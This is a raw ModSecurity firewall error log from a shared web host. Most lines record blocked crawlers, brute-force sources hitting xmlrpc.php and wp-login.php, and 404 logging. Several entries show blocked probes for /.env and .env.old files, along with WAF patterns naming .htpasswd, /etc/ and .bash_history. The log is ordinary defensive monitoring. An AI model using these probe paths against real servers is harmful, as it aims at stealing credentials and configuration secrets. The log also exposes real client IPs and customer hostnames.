[Tue May 26 14:56:29.406765 2026] [security2:error] [pid 662057:tid 662305] [client 176.65.139.237:40716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "triviewsolutions.com.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahVnRfT3lMm9tGFVg9RShAAAAYA"]
[Tue May 26 14:56:30.006959 2026] [security2:error] [pid 658374:tid 658576] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnRZ1Mb7_aby-E0Kc5sAAAAEg"]
[Tue May 26 14:56:30.465695 2026] [security2:error] [pid 658374:tid 658619] [client 144.76.32.117:21992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.32.76.144.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodrc.com"] [uri "/index.php"] [unique_id "ahVnRp1Mb7_aby-E0Kc50wAAAHM"]
[Tue May 26 14:56:31.457804 2026] [security2:error] [pid 658374:tid 658539] [client 154.161.32.97:57076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnR51Mb7_aby-E0Kc6AwAAACM"]
[Tue May 26 14:56:31.457924 2026] [security2:error] [pid 658374:tid 658539] [client 154.161.32.97:57076] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnR51Mb7_aby-E0Kc6AwAAACM"]
[Tue May 26 14:56:32.174430 2026] [security2:error] [pid 658374:tid 658617] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnR51Mb7_aby-E0Kc6CwAAAHE"]
[Tue May 26 14:56:34.523837 2026] [security2:error] [pid 658374:tid 658578] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnSp1Mb7_aby-E0Kc6PwAAAEo"]
[Tue May 26 14:56:36.710656 2026] [security2:error] [pid 658374:tid 658581] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnTJ1Mb7_aby-E0Kc6bAAAAE0"]
[Tue May 26 14:56:39.417429 2026] [security2:error] [pid 662057:tid 662199] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnTvT3lMm9tGFVg9RSsgAAARY"]
[Tue May 26 14:56:41.607049 2026] [security2:error] [pid 658374:tid 658554] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnUZ1Mb7_aby-E0Kc60QAAADI"]
[Tue May 26 14:56:43.486035 2026] [security2:error] [pid 662057:tid 662276] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnU_T3lMm9tGFVg9RS3QAAAWM"]
[Tue May 26 14:56:45.629937 2026] [security2:error] [pid 658374:tid 658610] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnVZ1Mb7_aby-E0Kc7CwAAAGo"]
[Tue May 26 14:56:45.911342 2026] [security2:error] [pid 658374:tid 658518] [client 114.119.156.165:58629] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVnVZ1Mb7_aby-E0Kc7HwAAAA4"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&path=72_79_132&product_id=185
[Tue May 26 14:56:46.503402 2026] [security2:error] [pid 662057:tid 662266] [client 185.181.246.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnVvT3lMm9tGFVg9RTBAAAAVk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:56:47.481206 2026] [security2:error] [pid 662057:tid 662230] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnV_T3lMm9tGFVg9RTDgAAATU"]
[Tue May 26 14:56:47.602599 2026] [autoindex:error] [pid 658374:tid 658539] [client 101.33.55.204:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.juniorwoodies.com
[Tue May 26 14:56:48.299807 2026] [security2:error] [pid 662057:tid 662234] [client 185.181.246.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnWPT3lMm9tGFVg9RTIgAAATk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1211478&moderation-hash=3ded9469bfca7963faca8216c3d67e90
[Tue May 26 14:56:48.502785 2026] [security2:error] [pid 662057:tid 662200] [client 52.28.162.93:20294] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVnV_T3lMm9tGFVg9RTIAAAARc"], referer: http://ucdc.co.in/
[Tue May 26 14:56:49.766721 2026] [security2:error] [pid 662057:tid 662288] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnWfT3lMm9tGFVg9RTMgAAAW8"]
[Tue May 26 14:56:52.005600 2026] [security2:error] [pid 662057:tid 662256] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnW_T3lMm9tGFVg9RTRgAAAU8"]
[Tue May 26 14:56:52.301645 2026] [security2:error] [pid 662057:tid 662230] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVnXPT3lMm9tGFVg9RTTwAAATU"]
[Tue May 26 14:56:52.302140 2026] [security2:error] [pid 658374:tid 658614] [client 66.249.64.110:55887] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVnXJ1Mb7_aby-E0Kc7hwAAAG4"]
[Tue May 26 14:56:52.424421 2026] [security2:error] [pid 662057:tid 662293] [client 74.7.244.56:55700] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.afstpaul.org"] [uri "/robots.txt"] [unique_id "ahVnXPT3lMm9tGFVg9RTUAABdGE"]
[Tue May 26 14:56:52.510585 2026] [security2:error] [pid 658374:tid 658551] [client 74.7.244.29:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVnXJ1Mb7_aby-E0Kc7kwAAAC8"]
[Tue May 26 14:56:52.511445 2026] [security2:error] [pid 658374:tid 658534] [client 74.7.244.29:36232] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVnXJ1Mb7_aby-E0Kc7jgAAHgM"]
[Tue May 26 14:56:53.421227 2026] [security2:error] [pid 658374:tid 658611] [client 43.173.182.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVnXJ1Mb7_aby-E0Kc7nwAAAGs"]
[Tue May 26 14:56:54.804547 2026] [security2:error] [pid 662057:tid 662198] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnXvT3lMm9tGFVg9RTdgAAARU"]
[Tue May 26 14:56:54.893668 2026] [security2:error] [pid 658374:tid 658613] [client 185.181.246.103:60273] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVnXp1Mb7_aby-E0Kc7vQAAAG0"], referer: https://anujtradingco.com
[Tue May 26 14:56:55.877766 2026] [security2:error] [pid 662057:tid 662245] [client 195.178.110.34:51142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVnX_T3lMm9tGFVg9RTggAAAUQ"]
[Tue May 26 14:56:57.246869 2026] [security2:error] [pid 662057:tid 662274] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnYPT3lMm9tGFVg9RTjgAAAWE"]
[Tue May 26 14:56:58.591786 2026] [security2:error] [pid 662057:tid 662246] [client 14.174.109.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnYvT3lMm9tGFVg9RToQAAAUU"]
[Tue May 26 14:56:59.192206 2026] [security2:error] [pid 658374:tid 658528] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnYp1Mb7_aby-E0Kc78wAAABg"]
[Tue May 26 14:57:01.203565 2026] [security2:error] [pid 658374:tid 658616] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnZJ1Mb7_aby-E0Kc8CgAAAHA"]
[Tue May 26 14:57:02.646246 2026] [security2:error] [pid 658374:tid 658609] [client 195.178.110.34:51156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVnZp1Mb7_aby-E0Kc8JwAAAGk"]
[Tue May 26 14:57:03.351927 2026] [security2:error] [pid 658374:tid 658393] [remote 123.30.233.13:42626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVnZ51Mb7_aby-E0Kc8MAAAaBI"]
[Tue May 26 14:57:03.905961 2026] [security2:error] [pid 662057:tid 662223] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnZ_T3lMm9tGFVg9RT2wAAAS4"]
[Tue May 26 14:57:05.665658 2026] [security2:error] [pid 658374:tid 658591] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnaZ1Mb7_aby-E0Kc8UQAAAB0"]
[Tue May 26 14:57:08.391037 2026] [security2:error] [pid 658374:tid 658508] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVna51Mb7_aby-E0Kc8fQAAAAQ"]
[Tue May 26 14:57:09.981923 2026] [security2:error] [pid 658374:tid 658587] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnbZ1Mb7_aby-E0Kc8nAAAAFM"]
[Tue May 26 14:57:10.622896 2026] [security2:error] [pid 658374:tid 658628] [client 195.178.110.34:52666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVnbp1Mb7_aby-E0Kc8pgAAAHw"]
[Tue May 26 14:57:11.094130 2026] [security2:error] [pid 658374:tid 658558] [client 66.249.66.75:55677] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.koneksi.com.co"] [uri "/index.php"] [unique_id "ahVnbp1Mb7_aby-E0Kc8pQAAADY"]
[Tue May 26 14:57:11.289650 2026] [security2:error] [pid 662057:tid 662228] [client 154.161.32.97:57077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnb_T3lMm9tGFVg9RUFQAAATM"]
[Tue May 26 14:57:11.289788 2026] [security2:error] [pid 662057:tid 662228] [client 154.161.32.97:57077] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnb_T3lMm9tGFVg9RUFQAAATM"]
[Tue May 26 14:57:12.467373 2026] [security2:error] [pid 662057:tid 662201] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVncPT3lMm9tGFVg9RUJAAAARg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:57:13.177926 2026] [security2:error] [pid 662057:tid 662198] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVncPT3lMm9tGFVg9RUNQAAARU"]
[Tue May 26 14:57:13.208744 2026] [security2:error] [pid 662057:tid 662236] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVncfT3lMm9tGFVg9RUQQAAATs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 14:57:14.337407 2026] [security2:error] [pid 662057:tid 662260] [client 47.128.55.53:40728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVncvT3lMm9tGFVg9RUTgAAAVM"]
[Tue May 26 14:57:14.937155 2026] [security2:error] [pid 658374:tid 658566] [client 154.161.32.97:47145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVncp1Mb7_aby-E0Kc87wAAAD4"]
[Tue May 26 14:57:14.937281 2026] [security2:error] [pid 658374:tid 658566] [client 154.161.32.97:47145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVncp1Mb7_aby-E0Kc87wAAAD4"]
[Tue May 26 14:57:14.975987 2026] [security2:error] [pid 658374:tid 658602] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVncp1Mb7_aby-E0Kc85QAAAGI"]
[Tue May 26 14:57:16.657400 2026] [security2:error] [pid 658374:tid 658554] [client 154.161.32.97:57078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVndJ1Mb7_aby-E0Kc9EQAAADI"]
[Tue May 26 14:57:16.657548 2026] [security2:error] [pid 658374:tid 658554] [client 154.161.32.97:57078] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVndJ1Mb7_aby-E0Kc9EQAAADI"]
[Tue May 26 14:57:17.199960 2026] [security2:error] [pid 658374:tid 658556] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVndJ1Mb7_aby-E0Kc9EgAAADQ"]
[Tue May 26 14:57:19.495263 2026] [security2:error] [pid 658374:tid 658598] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnd51Mb7_aby-E0Kc9OgAAAF4"]
[Tue May 26 14:57:21.136671 2026] [security2:error] [pid 662057:tid 662190] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnePT3lMm9tGFVg9RUmQAAAQ0"]
[Tue May 26 14:57:22.489129 2026] [security2:error] [pid 658374:tid 658558] [client 154.161.32.97:57079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnep1Mb7_aby-E0Kc9ZQAAADY"]
[Tue May 26 14:57:22.489233 2026] [security2:error] [pid 658374:tid 658558] [client 154.161.32.97:57079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnep1Mb7_aby-E0Kc9ZQAAADY"]
[Tue May 26 14:57:23.356068 2026] [security2:error] [pid 662057:tid 662058] [remote 74.7.241.58:45100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVne_T3lMm9tGFVg9RUuAABYwA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:57:23.423170 2026] [security2:error] [pid 658374:tid 658573] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVne51Mb7_aby-E0Kc9bgAAAEU"]
[Tue May 26 14:57:23.991068 2026] [security2:error] [pid 662057:tid 662296] [client 185.191.171.18:30222] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahVne_T3lMm9tGFVg9RUwQAAAXc"]
[Tue May 26 14:57:23.991250 2026] [security2:error] [pid 662057:tid 662296] [client 185.191.171.18:30222] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahVne_T3lMm9tGFVg9RUwQAAAXc"]
[Tue May 26 14:57:26.271247 2026] [security2:error] [pid 658374:tid 658555] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnfZ1Mb7_aby-E0Kc9mwAAADM"]
[Tue May 26 14:57:27.997692 2026] [security2:error] [pid 658374:tid 658574] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnf51Mb7_aby-E0Kc9vgAAAEY"]
